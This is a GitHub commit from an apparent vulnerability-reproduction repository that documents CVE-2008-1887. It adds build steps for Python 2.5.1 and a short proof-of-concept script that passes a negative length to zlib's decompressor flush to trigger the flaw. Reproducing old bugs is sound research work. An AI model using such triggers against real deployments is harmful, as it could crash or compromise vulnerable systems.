add info for CVE-2008-1887

mudongliang · May 31, 2018 · 7490893 · 7490893
1 parent 207448b
commit 7490893
Show file tree

Hide file tree

Showing 3 changed files with 33 additions and 1 deletion.
diff --git a/CVE-2008-1887/README.md b/CVE-2008-1887/README.md
@@ -2,14 +2,30 @@
 
 ## Experiment Environment
 
+Ubuntu 10.04
+
 ## INSTALL & Configuration
 
+```
+wget https://github.com/mudongliang/source-packages/raw/master/CVE-2008-5031/Python-2.5.1.tar.bz2
+tar -xvf Python-2.5.1.tar.bz2
+cd Python-2.5.1
+./configure
+make
+```
+
 ## Problems in Installation & Configuration
 
 ## How to trigger vulnerability
 
+```
+./python poc.py
+```
+
 ## PoCs
 
+[PyString_FromStringAndSize() to be considered unsafe](https://bugs.python.org/issue2587)
+
 ## Vulnerability Details & Patch
 
 ### Root Cause

diff --git a/CVE-2008-1887/poc.py b/CVE-2008-1887/poc.py
@@ -0,0 +1,16 @@
+import zlib
+msg = """
+        Desire to know why, and how, curiosity; such as is in no living creature but man:
+        so that man is distinguished, not only by his reason, but also by this singular passion
+        from other animals; in whom the appetite of food, and other pleasures of sense, by
+        predominance, take away the care of knowing causes; which is a lust of the mind,
+        that by a perseverance of delight in the continual and indefatigable
+        generation of knowledge, exceedeth the short vehemence of any carnal pleasure.
+"""
+
+compMsg = zlib.compress(msg)
+bad = -24
+decompObj = zlib.decompressobj()
+decompObj.decompress(compMsg)
+decompObj.flush(bad)
+
diff --git a/README.md b/README.md
@@ -121,7 +121,7 @@ If you encounter problems with keyword "Failed to lock files", you could try to
 - [x] CVE-2008-1767
 - [x] CVE-2008-1801
 - [x] CVE-2008-1802
-- [ ] CVE-2008-1887
+- [x] CVE-2008-1887
 - [ ] CVE-2008-2292 (Fail to reproduce)
 - [x] CVE-2008-2315
 - [ ] CVE-2008-2316 (Fail to reproduce)